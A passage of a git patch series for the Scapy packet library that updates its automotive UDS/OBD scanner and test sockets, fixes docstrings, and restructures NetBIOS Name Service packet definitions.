Enables smaller search space for unit-test + scenarios. This safes execution time.""" + + def execute(self, socket, state, **kwargs): + # type: (_SocketUnion, EcuState, Any) -> None + super(UDS_RDEnumerator, self).execute(socket, state, **kwargs) + + execute.__doc__ = _supported_kwargs_doc @staticmethod def _random_memory_addr_pkt(addr_len=None): # noqa: E501 @@ -1009,6 +1112,28 @@ def _get_table_entry_y(self, tup): class UDS_Scanner(AutomotiveTestCaseExecutor): + """ + Example: + >>> def reconnect(): + >>> return UDS_DoIPSocket("169.254.186.237") + >>> + >>> es = [UDS_ServiceEnumerator, UDS_WDBISelectiveEnumerator] + >>> + >>> s = UDS_Scanner(reconnect(), reconnect_handler=reconnect, + >>> reset_handler=reset_ecu, test_cases=es, + >>> UDS_DSCEnumerator_kwargs={ + >>> "timeout": 20, + >>> "overwrite_timeout": False, + >>> "scan_range": [1, 3]}) + >>> + >>> try: + >>> s.scan() + >>> except KeyboardInterrupt: + >>> pass + >>> + >>> s.show_testcases_status() + >>> s.show_testcases() + """ @property def default_test_case_clss(self): # type: () -> List[Type[AutomotiveTestCaseABC]] diff --git a/scapy/tools/automotive/obdscanner.py b/scapy/tools/automotive/obdscanner.py index 45bedddd839..468a43115ab 100755 --- a/scapy/tools/automotive/obdscanner.py +++ b/scapy/tools/automotive/obdscanner.py @@ -100,7 +100,7 @@ def get_isotp_socket(csock, source, destination): def run_scan(isock, enumerators, full_scan, verbose, timeout): s = OBD_Scanner(isock, test_cases=enumerators, full_scan=full_scan, - verbose=verbose, + debug=verbose, timeout=timeout) print("Starting OBD-Scan...") s.scan() diff --git a/test/contrib/automotive/ecu_am.uts b/test/contrib/automotive/ecu_am.uts index 61f702a3418..9c73ca3f041 100644 --- a/test/contrib/automotive/ecu_am.uts +++ b/test/contrib/automotive/ecu_am.uts @@ -15,6 +15,7 @@ from test.testsocket import TestSocket, cleanup_testsockets load_contrib("automotive.uds", globals_dict=globals()) load_contrib("automotive.ecu", globals_dict=globals()) +load_contrib("automotive.uds_ecu_states", globals_dict=globals()) conf.contribs['EcuAnsweringMachine']['send_delay'] = 0 diff --git a/test/contrib/automotive/gm/scanner.uts b/test/contrib/automotive/gm/scanner.uts index fdd19cde9aa..8a33a212d94 100644 --- a/test/contrib/automotive/gm/scanner.uts +++ b/test/contrib/automotive/gm/scanner.uts @@ -43,7 +43,7 @@ def executeScannerInVirtualEnvironment(supported_responses, enumerators, **kwarg scanner = GMLAN_Scanner( tester, reset_handler=reset, test_cases=enumerators, timeout=0.5, retry_if_none_received=True, - unittest=True, delay_state_change=0, **kwargs) + unittest=True, **kwargs) scanner.scan(timeout=200) finally: tester.send(Raw(b"\xff\xff\xff")) diff --git a/test/contrib/automotive/obd/scanner.uts b/test/contrib/automotive/obd/scanner.uts index f8c02037e60..2b54ad81bb8 100644 --- a/test/contrib/automotive/obd/scanner.uts +++ b/test/contrib/automotive/obd/scanner.uts @@ -106,7 +106,7 @@ answering_machine = EcuAnsweringMachine(supported_responses=responses, main_sock sim = threading.Thread(target=answering_machine, kwargs={"timeout": 50, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) sim.start() try: - s = OBD_Scanner(tester, full_scan=False, timeout=1, retry_if_none_received=True, delay_state_change=0) + s = OBD_Scanner(tester, full_scan=False, timeout=1, retry_if_none_received=True) s.scan() tester.send(b"\xff\xff\xff") finally: @@ -149,7 +149,7 @@ answering_machine = EcuAnsweringMachine(supported_responses=responses, main_sock sim = threading.Thread(target=answering_machine, kwargs={"timeout": 50, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) sim.start() try: - s = OBD_Scanner(tester, full_scan=True, timeout=1, delay_state_change=0, retry_if_none_received=True) + s = OBD_Scanner(tester, full_scan=True, timeout=1, retry_if_none_received=True) s.scan() tester.send(b"\xff\xff\xff") finally: @@ -193,7 +193,7 @@ answering_machine = EcuAnsweringMachine(supported_responses=responses, main_sock sim = threading.Thread(target=answering_machine, kwargs={"timeout": 50, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) sim.start() try: - s = OBD_Scanner(tester, test_cases=[OBD_S01_Enumerator], full_scan=False, retry_if_none_received=True, timeout=1, delay_state_change=0) + s = OBD_Scanner(tester, test_cases=[OBD_S01_Enumerator], full_scan=False, retry_if_none_received=True, timeout=1) s.scan() tester.send(b"\xff\xff\xff") finally: diff --git a/test/contrib/automotive/scanner/configuration.uts b/test/contrib/automotive/scanner/configuration.uts index 04074b7c297..1cf12b7223b 100644 --- a/test/contrib/automotive/scanner/configuration.uts +++ b/test/contrib/automotive/scanner/configuration.uts @@ -44,7 +44,6 @@ assert len(config.stages) == 0 assert len(config.staged_test_cases) == 0 assert config.verbose == False assert config.debug == False -assert config.delay_state_change > 0 = creation of config with instances @@ -58,7 +57,6 @@ assert len(config.stages) == 0 assert len(config.staged_test_cases) == 0 assert config.verbose == False assert config.debug == False -assert config.delay_state_change > 0 = creation of config with instances and classes @@ -72,7 +70,6 @@ assert len(config.stages) == 0 assert len(config.staged_test_cases) == 0 assert config.verbose == False assert config.debug == False -assert config.delay_state_change > 0 = creation of config with instances and classes and global configuration and local configuration @@ -87,7 +84,6 @@ assert len(config.stages) == 0 assert len(config.staged_test_cases) == 0 assert config.verbose == True assert config.debug == False -assert config.delay_state_change > 0 assert config["MyTestCase2"]["global_config"] == 42 assert config["MyTestCase2"]["local_config"] == 41 assert config["MyTestCase2"]["verbose"] == True @@ -120,7 +116,6 @@ assert len(config.stages) == 1 assert len(config.staged_test_cases) == 2 assert config.verbose == False assert config.debug == False -assert config.delay_state_change > 0 assert config.staged_test_cases[0].__class__ == MyTestCase1 assert config.staged_test_cases[1].__class__ == MyTestCase2 assert config.stages[0].__class__ == StagedAutomotiveTestCase @@ -147,11 +142,3 @@ assert config.staged_test_cases[1].__class__ == MyTestCase2 assert config.stages[0].__class__ == myStagedTestCase assert config.verbose == False assert config.debug == False -assert config.delay_state_change > 0 - - - - - - - diff --git a/test/contrib/automotive/scanner/enumerator.uts b/test/contrib/automotive/scanner/enumerator.uts index 39592e86190..d4536c1bd5f 100644 --- a/test/contrib/automotive/scanner/enumerator.uts +++ b/test/contrib/automotive/scanner/enumerator.uts @@ -251,6 +251,26 @@ assert not e.has_completed(EcuState(session=3)) assert not e.completed assert len(e.scanned_states) == 3 +e.execute(sock, EcuState(session=42), state_block_list=[EcuState(session=42)]) + +assert e.has_completed(EcuState(session=42)) +assert len(e.scanned_states) == 3 + +e.execute(sock, EcuState(session=13), state_block_list=EcuState(session=13)) + +assert e.has_completed(EcuState(session=13)) +assert len(e.scanned_states) == 3 + +e.execute(sock, EcuState(session=41), state_allow_list=[EcuState(session=42)]) + +assert e.has_completed(EcuState(session=41)) +assert len(e.scanned_states) == 3 + +e.execute(sock, EcuState(session=12), state_allow_list=EcuState(session=13)) + +assert e.has_completed(EcuState(session=12)) +assert len(e.scanned_states) == 3 + = Test negative response code service not supported sock.rcvd_queue.put(b"\x7f\x01\x11") @@ -351,21 +371,20 @@ class Scanner(AutomotiveTestCaseExecutor): = Basic tests tce = Scanner(MockSock(), test_cases=[TestCase1, TestCase2, MyTestCase], - verbose=True, delay_state_change=42, debug=True, + verbose=True, debug=True, global_arg="Whatever", TestCase1_kwargs={"local_kwarg": 42}) config = tce.configuration # type: AutomotiveTestCaseExecutorConfiguration -assert config.delay_state_change == 42 assert config.verbose assert config.debug assert len(config.test_cases) == 3 assert len(config.stages) == 0 assert len(config.staged_test_cases) == 0 assert len(config.test_case_clss) == 3 -assert len(config.TestCase1.items()) == 5 -assert len(config.TestCase2.items()) == 4 -assert len(config["TestCase1"].items()) == 5 -assert len(config.MyTestCase.items()) == 4 +assert len(config.TestCase1.items()) == 4 +assert len(config.TestCase2.items()) == 3 +assert len(config["TestCase1"].items()) == 4 +assert len(config.MyTestCase.items()) == 3 assert config.TestCase1["verbose"] assert config.TestCase1["debug"] assert config.TestCase1["local_kwarg"] == 42 @@ -380,7 +399,6 @@ assert isinstance(tce.socket, SingleConversationSocket) tce = Scanner(MockSock()) config = tce.configuration # type: AutomotiveTestCaseExecutorConfiguration -assert config.delay_state_change == 0.5 assert not config.verbose assert not config.debug assert len(config.test_cases) == 1 @@ -402,7 +420,6 @@ pipeline = StagedAutomotiveTestCase([tc1, tc2], [None, connector]) tce = Scanner(MockSock(), test_cases=[pipeline]) config = tce.configuration # type: AutomotiveTestCaseExecutorConfiguration -assert config.delay_state_change == 0.5 assert not config.verbose assert not config.debug assert len(config.test_cases) == 1 @@ -431,7 +448,6 @@ pipeline2 = StagedTest([MyTestCase(), MyTestCase()]) tce = Scanner(MockSock(), test_cases=[pipeline, pipeline2], verbose=True) config = tce.configuration # type: AutomotiveTestCaseExecutorConfiguration -assert config.delay_state_change == 0.5 assert config.verbose assert not config.debug assert len(config.test_cases) == 2 @@ -536,7 +552,6 @@ class TestCase42(MyTestCase): global pre_exec assert state == EcuState(session=1) assert global_configuration.TestCase42["local_kwarg"] == 42 - assert global_configuration.TestCase42["delay_state_change"] == 42 assert global_configuration.TestCase42["verbose"] assert global_configuration.TestCase42["debug"] global_configuration.TestCase42["local_kwarg"] = 1 @@ -546,7 +561,6 @@ class TestCase42(MyTestCase): assert verbose assert debug assert local_kwarg == 1 - assert kwargs["delay_state_change"] == 42 execute = True def post_execute(self, socket, # type: _SocketUnion @@ -555,14 +569,13 @@ class TestCase42(MyTestCase): ): # type: (...) -> None global post_exec assert global_configuration.TestCase42["local_kwarg"] == 1 - assert global_configuration.TestCase42["delay_state_change"] == 42 assert global_configuration.TestCase42["verbose"] assert global_configuration.TestCase42["debug"] post_exec = True tce = Scanner(MockSock(), test_cases=[TestCase42], - verbose=True, delay_state_change=42, debug=True, + verbose=True, debug=True, TestCase42_kwargs={"local_kwarg": 42}) tce.execute_test_case(TestCase42()) diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index 4ae8caf7979..6dc00afda91 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -7,7 +7,7 @@ import io import pickle from scapy.contrib.isotp import ISOTPMessageBuilder -from test.testsocket import TestSocket, cleanup_testsockets +from test.testsocket import TestSocket, cleanup_testsockets, UnstableSocket ############ ############ @@ -25,25 +25,34 @@ load_layer("can") = Define Testfunction -conf.contribs['EcuAnsweringMachine']['send_delay'] = 0.0 +conf.contribs['EcuAnsweringMachine']['send_delay'] = 0.01 -def executeScannerInVirtualEnvironment(supported_responses, enumerators, **kwargs): +def executeScannerInVirtualEnvironment(supported_responses, enumerators, unstable_socket=True, **kwargs): + TesterSocket = UnstableSocket if unstable_socket else TestSocket ecu = TestSocket(UDS) - tester = TestSocket(UDS) + tester = TesterSocket(UDS) def reset(): answering_machine.state.reset() answering_machine.state["session"] = 1 - sniff(timeout=0.01, opened_socket=[ecu, tester]) + sniff(timeout=0.001, opened_socket=[ecu, tester]) + def reconnect(): + tester = TesterSocket(UDS) + ecu.pair(tester) + return tester ecu.pair(tester) answering_machine = EcuAnsweringMachine(supported_responses=supported_responses, main_socket=ecu, basecls=UDS, verbose=False) sim = threading.Thread(target=answering_machine, kwargs={'timeout': 1000, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) sim.start() try: scanner = UDS_Scanner( - tester, reset_handler=reset, test_cases=enumerators, timeout=0.5, - retry_if_none_received=True, unittest=True, delay_state_change=0, + tester, reset_handler=reset, reconnect_handler=reconnect, test_cases=enumerators, timeout=0.1, + retry_if_none_received=True, unittest=True, **kwargs) - scanner.scan(timeout=200) + for i in range(100): + scanner.scan(timeout=20) + if scanner.scan_completed: + print("Scan completed after %d iterations" % i) + break finally: tester.send(Raw(b"\xff\xff\xff")) sim.join(timeout=2) @@ -124,8 +133,15 @@ assert e._retry_pkt[s] == None scanner = executeScannerInVirtualEnvironment( mEcu.supported_responses, [UDS_SA_XOR_Enumerator, UDS_DSCEnumerator, UDS_ServiceEnumerator], - UDS_DSCEnumerator_kwargs={"scan_range": range(5)}, - UDS_SA_XOR_Enumerator_kwargs={"scan_range": range(5)}) + UDS_DSCEnumerator_kwargs={"scan_range": range(5), "delay_state_change": 0, + "overwrite_timeout": False}, + UDS_SA_XOR_Enumerator_kwargs={"scan_range": range(5)}, + UDS_ServiceEnumerator_kwargs={"scan_range": [0x10, 0x11, 0x14, 0x19, 0x22, + 0x23, 0x24, 0x27, 0x28, 0x29, + 0x2A, 0x2C, 0x2E, 0x2F, 0x31, + 0x34, 0x35, 0x36, 0x37, 0x38, + 0x3D, 0x3E, 0x83, 0x84, 0x85, + 0x87]}) assert len(scanner.state_paths) == 5 assert scanner.scan_completed @@ -174,14 +190,14 @@ assert len(tc.results_without_response) < 10 if tc.results_without_response: tc.show() -assert len(tc.results_with_negative_response) == 640 +assert len(tc.results_with_negative_response) == 130 assert len(tc.results_with_positive_response) == 0 assert len(tc.scanned_states) == 5 result = tc.show(dump=True) assert "incorrectMessageLengthOrInvalidFormat received 34 times" in result -assert "serviceNotSupported received 585 times" in result +assert "serviceNotSupported received 75 times" in result assert "serviceNotSupportedInActiveSession received 19 times" in result assert "securityAccessDenied received 2 times" in result @@ -225,6 +241,7 @@ assert 3 in ids assert 0xff in ids = UDS_RDBISelectiveEnumerator +~ not_pypy resps = [EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x101)/Raw(b"asdfbeef1")]), EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x102)/Raw(b"beef2")]), @@ -742,7 +759,8 @@ resps = [EcuResponse(None, [UDS()/UDS_RDPR()], answers=answers_rd), ####################################################### scanner = executeScannerInVirtualEnvironment( - resps, [UDS_RDEnumerator], UDS_RDEnumerator_kwargs={"unittest": True}) + resps, [UDS_RDEnumerator], unstable_socket=False, + UDS_RDEnumerator_kwargs={"unittest": True}) assert scanner.scan_completed tc1 = scanner.configuration.test_cases[0] @@ -807,7 +825,7 @@ resps = [EcuResponse(None, [UDS()/UDS_RMBAPR(dataRecord=b'')], answers=answers_r ####################################################### scanner = executeScannerInVirtualEnvironment( - resps, [UDS_RMBAEnumerator], + resps, [UDS_RMBAEnumerator], unstable_socket=False, UDS_RMBARandomEnumerator_kwargs={"unittest": True}) assert scanner.scan_completed @@ -871,4 +889,4 @@ assert 3 in ids = Delete testsockets -cleanup_testsockets() \ No newline at end of file +cleanup_testsockets() diff --git a/test/testsocket.py b/test/testsocket.py index 29fdbc7b4a7..bf5d14eea5f 100644 --- a/test/testsocket.py +++ b/test/testsocket.py @@ -7,13 +7,13 @@ # scapy.contrib.status = library import time +import random from scapy.config import conf -import scapy.modules.six as six from scapy.automaton import ObjectPipe, select_objects from scapy.data import MTU from scapy.packet import Packet -from scapy.plist import PacketList, SndRcvList +from scapy.error import Scapy_Exception from scapy.compat import Optional, Type, Tuple, Any, List, cast from scapy.supersocket import SuperSocket @@ -44,6 +44,11 @@ def __exit__(self, exc_type, exc_value, traceback): def close(self): # type: () -> None + for s in self.paired_sockets: + try: + s.paired_sockets.remove(self) + except ValueError: + pass self.closed = True super(TestSocket, self).close() @@ -82,6 +87,25 @@ def select(sockets, remain=conf.recv_poll_rate): return cast(List[SuperSocket], select_objects(sock, remain)) +class UnstableSocket(TestSocket): + """ + This is an unstable socket which randomly fires exceptions or loses + packets on recv. + """ + + def recv(self, x=MTU): # type: ignore + # type: (int) -> Optional[Packet] + if random.randint(0, 1000) == 42: + raise OSError("Socket closed") + if random.randint(0, 1000) == 13: + raise Scapy_Exception("Socket closed") + if random.randint(0, 1000) == 7: + raise ValueError("Socket closed") + if random.randint(0, 1000) == 113: + return None + return super(UnstableSocket, self).recv(x) + + def cleanup_testsockets(): # type: () -> None """ From d57ae7e4053ac3d5f1ea296f8851f51aec5a5115 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 22 Nov 2021 17:16:16 +0100 Subject: [PATCH 0693/1632] Remove leftover file --- test/contrib/automotive/uds_utils.uts | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 test/contrib/automotive/uds_utils.uts diff --git a/test/contrib/automotive/uds_utils.uts b/test/contrib/automotive/uds_utils.uts deleted file mode 100644 index e69de29bb2d..00000000000 From 8ad0dd8a7070a89ebe1b24eafe490e15bee31ba0 Mon Sep 17 00:00:00 2001 From: fouzhe <862006904@qq.com> Date: Fri, 19 Nov 2021 21:19:30 +0800 Subject: [PATCH 0694/1632] fix description of PacketListField --- scapy/fields.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index bbb321ae306..27388e1cfff 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1464,8 +1464,8 @@ def getfield(self, class PacketListField(_PacketField[List[BasePacket]]): - """PacketListField represents a series of Packet instances that might - occur right in the middle of another Packet field list. + """PacketListField represents a list containing a series of Packet instances + that might occur right in the middle of another Packet field. This field type may also be used to indicate that a series of Packet instances have a sibling semantic instead of a parent/child relationship (i.e. a stack of layers). From 404cc4fa12e29821a285b1626180ab2bbdfe7f28 Mon Sep 17 00:00:00 2001 From: fouzhe <862006904@qq.com> Date: Sat, 20 Nov 2021 15:06:48 +0800 Subject: [PATCH 0695/1632] update comment --- scapy/fields.py | 2 +- scapy/packet.py | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index 27388e1cfff..e5bee79d165 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1464,7 +1464,7 @@ def getfield(self, class PacketListField(_PacketField[List[BasePacket]]): - """PacketListField represents a list containing a series of Packet instances + """PacketListField represents a list containing a series of Packet instances that might occur right in the middle of another Packet field. This field type may also be used to indicate that a series of Packet instances have a sibling semantic instead of a parent/child relationship diff --git a/scapy/packet.py b/scapy/packet.py index 7ef6a3191ec..aaa74b6c29c 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -710,7 +710,7 @@ def post_build(self, pkt, pay): """ DEV: called right after the current layer is build. - :param str pkt: the current packet (build by self_buil function) + :param str pkt: the current packet (build by self_build function) :param str pay: the packet payload (build by do_build_payload function) :return: a string of the packet with the payload """ From c17140a419e3e4496706faa1cb9753816a6c586b Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 18 Oct 2021 12:05:10 +0200 Subject: [PATCH 0696/1632] NBNS rework --- scapy/ansmachine.py | 22 +++ scapy/layers/netbios.py | 244 +++++++++++++++++++++------------- test/scapy/layers/netbios.uts | 38 +++++- 3 files changed, 209 insertions(+), 95 deletions(-) diff --git a/scapy/ansmachine.py b/scapy/ansmachine.py index 411cd1aa4d0..685ebf704ee 100644 --- a/scapy/ansmachine.py +++ b/scapy/ansmachine.py @@ -186,3 +186,25 @@ def __call__(self, *args, **kargs): def sniff(self): # type: () -> None sniff(**self.optsniff) + + +class AnsweringMachineUtils: + @staticmethod + def reverse_packet(req): + # type: (Packet) -> Packet + from scapy.layers.l2 import Ether + from scapy.layers.inet import IP, TCP, UDP + reply = req.copy() + for layer in [UDP, TCP]: + if req.haslayer(layer): + reply[layer].dport, reply[layer].sport = \ + req[layer].sport, req[layer].dport + reply[layer].chksum = None + reply[layer].len = None + if req.haslayer(IP): + reply[IP].src, reply[IP].dst = req[IP].dst, req[IP].src + reply[IP].chksum = None + reply[IP].len = None + if req.haslayer(Ether): + reply[Ether].src, reply[Ether].dst = req[Ether].dst, req[Ether].src + return reply diff --git a/scapy/layers/netbios.py b/scapy/layers/netbios.py index 80a7a6d1cf7..5aa12ffbb50 100644 --- a/scapy/layers/netbios.py +++ b/scapy/layers/netbios.py @@ -10,11 +10,27 @@ """ import struct - -from scapy.packet import Packet, bind_bottom_up, bind_layers -from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ - IPField, IntField, NetBIOSNameField, ShortEnumField, ShortField, \ - StrFixedLenField, XShortField +from scapy.arch import get_if_addr +from scapy.ansmachine import AnsweringMachine, AnsweringMachineUtils +from scapy.config import conf + +from scapy.packet import Packet, bind_bottom_up, bind_layers, bind_top_down +from scapy.fields import ( + BitEnumField, + BitField, + ByteEnumField, + ByteField, + FieldLenField, + FlagsField, + IPField, + IntField, + NetBIOSNameField, + PacketListField, + ShortEnumField, + ShortField, + StrFixedLenField, + XShortField +) from scapy.layers.inet import UDP, TCP from scapy.layers.l2 import SourceMACField @@ -90,38 +106,60 @@ def post_build(self, p, pay): 1: "Group name" } + +class NBNSHeader(Packet): + name = "NBNS Header" + fields_desc = [ + ShortField("NAME_TRN_ID", 0), + BitField("RESPONSE", 0, 1), + BitField("OPCODE", 0, 4), + FlagsField("NM_FLAGS", 0, 7, ["B", + "res1", + "res0", + "RA", + "RD", + "TC", + "AA"]), + BitField("RCODE", 0, 4), + ShortField("QDCOUNT", 0), + ShortField("ANCOUNT", 0), + ShortField("NSCOUNT", 0), + ShortField("ARCOUNT", 0), + ] + # Name Query Request # Node Status Request class NBNSQueryRequest(Packet): name = "NBNS query request" - fields_desc = [ShortField("NAME_TRN_ID", 0), - ShortField("FLAGS", 0x0110), - ShortField("QDCOUNT", 1), - ShortField("ANCOUNT", 0), - ShortField("NSCOUNT", 0), - ShortField("ARCOUNT", 0), - NetBIOSNameField("QUESTION_NAME", "windows"), + fields_desc = [NetBIOSNameField("QUESTION_NAME", "windows"), ShortEnumField("SUFFIX", 0x4141, _NETBIOS_SUFFIXES), ByteField("NULL", 0), ShortEnumField("QUESTION_TYPE", 0x20, _NETBIOS_QRTYPES), ShortEnumField("QUESTION_CLASS", 1, _NETBIOS_QRCLASS)] + def mysummary(self): + return "NBNSQueryRequest who has '\\\\%s'" % ( + self.QUESTION_NAME.strip().decode() + ) + + +bind_layers(NBNSHeader, NBNSQueryRequest, + OPCODE=0x0, NM_FLAGS=0x11, QDCOUNT=1) + # Name Registration Request -# Name Refresh Request -# Name Release Request or Demand -class NBNSRequest(Packet): - name = "NBNS request" +class NBNSRegistrationRequest(Packet): + name = "NBNS registration request" fields_desc = [ShortField("NAME_TRN_ID", 0), ShortField("FLAGS", 0x2910), ShortField("QDCOUNT", 1), ShortField("ANCOUNT", 0), ShortField("NSCOUNT", 0), ShortField("ARCOUNT", 1), - NetBIOSNameField("QUESTION_NAME", "windows"), + NetBIOSNameField("QUESTION_NAME", "Windows"), ShortEnumField("SUFFIX", 0x4141, _NETBIOS_SUFFIXES), ByteField("NULL", 0), ShortEnumField("QUESTION_TYPE", 0x20, _NETBIOS_QRTYPES), @@ -137,79 +175,55 @@ class NBNSRequest(Packet): BitEnumField("UNUSED", 0, 13, {0: "Unused"}), IPField("NB_ADDRESS", "127.0.0.1")] + +bind_layers(NBNSHeader, NBNSRegistrationRequest, + OPCODE=0x5, NM_FLAGS=0x11, QDCOUNT=1, ARCOUNT=1) + # Name Query Response -# Name Registration Response + + +class NBNS_ADD_ENTRY(Packet): + fields_desc = [ + BitEnumField("G", 0, 1, _NETBIOS_GNAMES), + BitEnumField("OWNER_NODE_TYPE", 00, 2, + _NETBIOS_OWNER_MODE_TYPES), + BitEnumField("UNUSED", 0, 13, {0: "Unused"}), + IPField("NB_ADDRESS", "127.0.0.1") + ] class NBNSQueryResponse(Packet): name = "NBNS query response" - fields_desc = [ShortField("NAME_TRN_ID", 0), - ShortField("FLAGS", 0x8500), - ShortField("QDCOUNT", 0), - ShortField("ANCOUNT", 1), - ShortField("NSCOUNT", 0), - ShortField("ARCOUNT", 0), - NetBIOSNameField("RR_NAME", "windows"), + fields_desc = [NetBIOSNameField("RR_NAME", "windows"), ShortEnumField("SUFFIX", 0x4141, _NETBIOS_SUFFIXES), ByteField("NULL", 0), ShortEnumField("QUESTION_TYPE", 0x20, _NETBIOS_QRTYPES), ShortEnumField("QUESTION_CLASS", 1, _NETBIOS_QRCLASS), IntField("TTL", 0x493e0), - ShortField("RDLENGTH", 6), - ShortField("NB_FLAGS", 0), - IPField("NB_ADDRESS", "127.0.0.1")] + FieldLenField("RDLENGTH", None, length_of="ADDR_ENTRY"), + PacketListField("ADDR_ENTRY", + [NBNS_ADD_ENTRY()], NBNS_ADD_ENTRY, + length_from=lambda pkt: pkt.RDLENGTH) + ] -# Name Query Response (negative) -# Name Release Response + def mysummary(self): + if not self.ADDR_ENTRY: + return "NBNSQueryResponse" + return "NBNSQueryResponse '\\\\%s' is at %s" % ( + self.RR_NAME.strip().decode(), + self.ADDR_ENTRY[0].NB_ADDRESS + ) -class NBNSQueryResponseNegative(Packet): - name = "NBNS query response (negative)" - fields_desc = [ShortField("NAME_TRN_ID", 0), - ShortField("FLAGS", 0x8506), - ShortField("QDCOUNT", 0), - ShortField("ANCOUNT", 1), - ShortField("NSCOUNT", 0), - ShortField("ARCOUNT", 0), - NetBIOSNameField("RR_NAME", "windows"), - ShortEnumField("SUFFIX", 0x4141, _NETBIOS_SUFFIXES), - ByteField("NULL", 0), - ShortEnumField("RR_TYPE", 0x20, _NETBIOS_QRTYPES), - ShortEnumField("RR_CLASS", 1, _NETBIOS_QRCLASS), - IntField("TTL", 0), - ShortField("RDLENGTH", 6), - BitEnumField("G", 0, 1, _NETBIOS_GNAMES), - BitEnumField("OWNER_NODE_TYPE", 00, 2, - _NETBIOS_OWNER_MODE_TYPES), - BitEnumField("UNUSED", 0, 13, {0: "Unused"}), - IPField("NB_ADDRESS", "127.0.0.1")] - -# Node Status Response +bind_layers(NBNSHeader, NBNSQueryResponse, + OPCODE=0x0, NM_FLAGS=0x50, RESPONSE=1, ANCOUNT=1) -class NBNSNodeStatusResponse(Packet): - name = "NBNS Node Status Response" - fields_desc = [ShortField("NAME_TRN_ID", 0), - ShortField("FLAGS", 0x8500), - ShortField("QDCOUNT", 0), - ShortField("ANCOUNT", 1), - ShortField("NSCOUNT", 0), - ShortField("ARCOUNT", 0), - NetBIOSNameField("RR_NAME", "windows"), - ShortEnumField("SUFFIX", 0x4141, _NETBIOS_SUFFIXES), - ByteField("NULL", 0), - ShortEnumField("RR_TYPE", 0x21, _NETBIOS_QRTYPES), - ShortEnumField("RR_CLASS", 1, _NETBIOS_QRCLASS), - IntField("TTL", 0), - ShortField("RDLENGTH", 83), - ByteField("NUM_NAMES", 1)] - -# Service for Node Status Response - +# Node Status Response class NBNSNodeStatusResponseService(Packet): name = "NBNS Node Status Response Service" - fields_desc = [StrFixedLenField("NETBIOS_NAME", "WINDOWS ", 15), + fields_desc = [StrFixedLenField("NETBIOS_NAME", "WINDOWS ", 16), ByteEnumField("SUFFIX", 0, {0: "workstation", 0x03: "messenger service", 0x20: "file server service", @@ -220,26 +234,39 @@ class NBNSNodeStatusResponseService(Packet): ByteField("NAME_FLAGS", 0x4), ByteEnumField("UNUSED", 0, {0: "unused"})] -# End of Node Status Response packet + def default_payload_class(self, payload): + return conf.padding_layer -class NBNSNodeStatusResponseEnd(Packet): +class NBNSNodeStatusResponse(Packet): name = "NBNS Node Status Response" - fields_desc = [SourceMACField("MAC_ADDRESS"), + fields_desc = [NetBIOSNameField("RR_NAME", "windows"), + ShortEnumField("SUFFIX", 0x4141, _NETBIOS_SUFFIXES), + ByteField("NULL", 0), + ShortEnumField("RR_TYPE", 0x21, _NETBIOS_QRTYPES), + ShortEnumField("RR_CLASS", 1, _NETBIOS_QRCLASS), + IntField("TTL", 0), + ShortField("RDLENGTH", 83), + FieldLenField("NUM_NAMES", None, fmt="B", + count_of="NODE_NAME"), + PacketListField("NODE_NAME", + [NBNSNodeStatusResponseService()], + NBNSNodeStatusResponseService, + count_from=lambda pkt: pkt.NUM_NAMES), + SourceMACField("MAC_ADDRESS"), BitField("STATISTICS", 0, 57 * 8)] + +bind_layers(NBNSHeader, NBNSNodeStatusResponse, + OPCODE=0x0, NM_FLAGS=0x40, RESPONSE=1, ANCOUNT=1) + + # Wait for Acknowledgement Response class NBNSWackResponse(Packet): name = "NBNS Wait for Acknowledgement Response" - fields_desc = [ShortField("NAME_TRN_ID", 0), - ShortField("FLAGS", 0xBC07), - ShortField("QDCOUNT", 0), - ShortField("ANCOUNT", 1), - ShortField("NSCOUNT", 0), - ShortField("ARCOUNT", 0), - NetBIOSNameField("RR_NAME", "windows"), + fields_desc = [NetBIOSNameField("RR_NAME", "windows"), ShortEnumField("SUFFIX", 0x4141, _NETBIOS_SUFFIXES), ByteField("NULL", 0), ShortEnumField("RR_TYPE", 0x20, _NETBIOS_QRTYPES), @@ -249,6 +276,12 @@ class NBNSWackResponse(Packet): BitField("RDATA", 10512, 16)] # 10512=0010100100010000 +bind_layers(NBNSHeader, NBNSWackResponse, + OPCODE=0x7, NM_FLAGS=0x40, RESPONSE=1, ANCOUNT=1) + +# NetBIOS DATAGRAM HEADER + + class NBTDatagram(Packet): name = "NBT Datagram Packet" fields_desc = [ByteField("Type", 0x10), @@ -265,6 +298,8 @@ class NBTDatagram(Packet): ShortEnumField("SUFFIX2", 0x4141, _NETBIOS_SUFFIXES), ByteField("NULL2", 0)] +# SESSION SERVICE PACKETS + class NBTSession(Packet): name = "NBT Session Packet" @@ -284,16 +319,10 @@ def post_build(self, pkt, pay): return pkt + pay -bind_layers(UDP, NBNSQueryRequest, dport=137) -bind_layers(UDP, NBNSRequest, dport=137) -bind_layers(UDP, NBNSQueryResponse, sport=137) -bind_layers(UDP, NBNSQueryResponseNegative, sport=137) -bind_layers(UDP, NBNSNodeStatusResponse, sport=137) -bind_layers(NBNSNodeStatusResponse, NBNSNodeStatusResponseService, ) -bind_layers(NBNSNodeStatusResponse, NBNSNodeStatusResponseService, ) -bind_layers(NBNSNodeStatusResponseService, NBNSNodeStatusResponseService, ) -bind_layers(NBNSNodeStatusResponseService, NBNSNodeStatusResponseEnd, ) -bind_layers(UDP, NBNSWackResponse, sport=137) +bind_bottom_up(UDP, NBNSHeader, dport=137) 